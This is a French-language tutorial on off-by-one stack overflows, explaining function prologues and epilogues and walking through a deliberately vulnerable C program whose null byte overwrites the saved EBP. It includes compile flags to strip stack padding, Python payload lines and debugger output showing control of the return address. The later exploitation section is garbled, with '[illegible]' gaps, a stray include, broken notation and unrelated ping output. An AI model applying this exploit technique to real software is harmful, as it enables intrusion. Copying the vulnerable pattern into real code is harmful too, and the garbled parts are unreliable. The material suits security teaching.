

# Sommaire

Prologue et Epilogue

La faille en concret

Exploitation

## 1. Prologue et Epilogue

Le prologue et l'épilogue sont des règles de base quand on programme en assembleur. Ils permettent d'exécuter une fonction sans endommager les données environnantes. Vous devez probablement les rencontrer à chaque débogage. Le prologue se compose en deux instructions :

```
PUSH EBP
MOV EBP, ESP
```

Généralement un "SUB ESP, 80" par exemple suit le prologue. Ça sert à allouer l'espace mémoire pour stocker les données temporaires. Maintenant l'épilogue (on en trouve 2 sortes), la première :

```
LEAVE
RET
```

Et la deuxième :

```
MOV ESP, EBP
POP EBP
RET
```

Il n'y a strictement aucune différence entre les deux si ce n'est le nombre d'opcodes et le temps processeur.

On peut voir que le prologue sauvegarde la configuration de la pile (ou stack) et que l'épilogue la restaure. Cela veut dire que si un buffer overflow a lieu, il écrasera la sauvegarde d'EBP et donc le pointeur du bas de la stack sera entièrement désordonné. Jusqu'à là ce n'est pas vraiment notre problème car généralement on saute sur un shellcode.

Regardons à présent quel bug peut se produire si seule la sauvegarde d'EBP est écrasée.

## 2. La faille en concret

Admettons un programme appelant une fonction en interne, et cette fonction est vulnérable. Un buffer overflow se produit (mais n'écrasent que la sauvegarde d'EBP)... Regardons alors ce que cela provoque :

```
PUSH EBP
MOV EBP, ESP
...
    PUSH EBP
    MOV EBP, ESP
    ...
    le débordement a lieu
    ...
    MOV ESP, EBP
    POP EBP
    RET
...
```

```
MOV ESP, EBP
POP EBP
RET
```

En rouge nous voyons les registres corrompus. On peut remarquer qu'au retour de la fonction où le débordement a lieu, le registre ESP est tout à fait correct, donc la suite du programme se déroule correctement. Arrivé à l'épilogue de la fonction principale nous plaçons EBP dans ESP. Seulement, EBP a été écrasé... nous remplaçons donc ESP par la valeur corrompue. Nous savons bien que RET (l'instruction suivante) fait un POP EIP... donc cela veut dire que l'on prend l'adresse pointée par ESP pour sauter dessus. Comme ESP a été corrompu on peut donc pointer sur une autre valeur et donc sauter où on le souhaite. Allez, passons à la pratique ! Je suis sous Windows, car sous Linux, à cause des paddings et de l'endroit où sont stockés les arguments c'est plus galère à faire. Et comme on fait une initiation, cela ne change pas le problème. Voici le code du programme vulnérable :

```
#include <stdio.h>;
```

```
void vuln(char * strSource);
void exploitation(void);
```

```
int main(int argc, char * argv[]) {
    if (argc < 2) return 0;
    printf("Copie en cours...");
    vuln(argv[1]);
    return 0;
}
```

```
void vuln(char * strSource) {
    char buffer[1024];

    strncpy(buffer, strSource, 1024);
    buffer[1024] = 0;
    return;
}
```

```
void exploitation(void){
    printf("\nDetournement du programme réussi !\n");
    exit(0);
}
```

Dans un premier temps, nous essaierons de sauter sur la fonction exploitation(). J'ai mis en rouge la ligne où le 'bug' se produira. Dans son ensemble le programme va appeler la fonction vuln() qui copiera ARGV[1] dans un buffer (sans déborder, grâce à strncpy() ) puis un bit null sera placé à argv[1][1024]. C'est là que se situe la faille : pour les pointeurs, le [0] est le 1er octet, et donc le [1024] sera le 1025e octet. Au 1025e octet nous allons alors toucher un octet en dehors de notre buffer. Et cet octet tombe exactement dans EBP, pas de bol pour le programme... Le dernier octet d'EBP sera donc mis à 0, c'est comme si on faisait à EBP un "AND EBP, FFFFFFF0". Lors du "MOV ESP,EBP" final nous allons alors faire remonter ESP bien plus haut que ce qu'il devrait être (avec un peu de chance dans notre buffer) et donc le ret se produira sur une autre adresse mais toujours dans la stack (avec un peu de chance que nous aurons pu modifier).

Une petite remarque pour la compilation du programme : GCC 3.x ajoute un padding par défaut à chaque fin de chaîne, il faut donc compiler le code source avec la commande suivante (afin de retirer ce padding) :

```
gcc -o vuln.exe vuln.c -mpreferred-stack-boundary=2
```

Notre prog est compilé, voyons alors ce que cela donne si on remplit le buffer :

```
C:\>python -c "print 'a'*1024"
```

[illegible]

```
C:\>vuln
```

[illegible]

A ce moment on a notre gestionnaire d'exception habituel qui se lance, on affiche donc le rapport d'erreurs et on voit que cela a planté à cette adresse : "Offset: 61616161". Tiens, mais c'est notre buffer ça :-)

```

004012F3 |. E8 38050000 CALL <JMP.&msvcrt.strncpy> ;
\strncpy
...
004012D1 \. C3 RETN

```

```
0022FB5C    0022FB68    |dest = 0022FB68
0022FB60    003D255D    |src = "aaa[...]aaa"...
0022FB64    00000400    \maxlen = 400 (1024.)
```

0022FF04 61616161

```
C:\>python -c "print 'a'*924+'bbbb'"
```

```
C:\>vuln
```

[illegible]



```
#include <stdio.h>
```

$$// \wedge \text{-----} \wedge \wedge \text{-----} \wedge \wedge \text{-----} \wedge$$

Paquets : envoyés = 4, reçus = 4, perdus = 0 (perte 0%),  
Durée approximative des boucles en millisecondes :  
Minimum = 0ms, Maximum = 0ms, Moyenne = 0ms

Evidemment, on peut exploiter cette faille par shellcode... mais bon c'était plus sympa de faire le recoupement avec le ret into libc :).

## Conclusion

Certains peuvent se dire qu'on ne trouve et ne trouvera jamais ce genre de vulnérabilité. Fausse idée, par exemple Proftpd en avait plusieurs a son actif. Certes il est plus long d'exploiter un off by one ou off by two (comme dans le cas de proftpd) qu'un buffer overflow normal. Mais étant donné que cette vulnérabilité existe je trouvais normal de la présenter.

## Références

[Hackademy - Très bon article de HeXoR sur cette faille](#)